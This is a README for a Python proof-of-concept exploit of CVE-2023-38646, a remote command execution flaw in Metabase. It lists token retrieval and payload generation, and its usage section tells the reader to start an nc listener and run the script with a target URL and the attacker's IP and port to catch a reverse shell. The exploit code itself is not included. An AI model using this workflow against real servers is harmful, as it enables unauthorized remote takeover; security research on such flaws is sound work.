Proof-of-Concept script for exploiting CVE-2023-38646. Intended for educational and research purposes only.

JayRyz/CVE-2023-38646-PoC-Metabase

CVE-2023-38646-PoC-Metabase

Description

This is a Python-based Proof-of-Concept (PoC) script to exploit CVE-2023-38646, a vulnerability affecting Metabase. The exploit abuses misconfigurations to achieve remote command execution.

⚠️ Disclaimer:
This script is intended solely for educational purposes and ethical research. Misuse of this script to attack systems without prior consent is illegal and unethical. The author is not responsible for any damage caused by the use of this tool.

Features

  • Retrieves session tokens automatically
  • Generates payloads for remote command execution
  • Automates exploit deployment

Requirements

  • Python 3.7+
  • requests library (pip install requests)

Usage

  • Make sure to listen on the port with nc first.
python3 exploit.py -u <target_url> -ip <your_ip> -p <your_port>
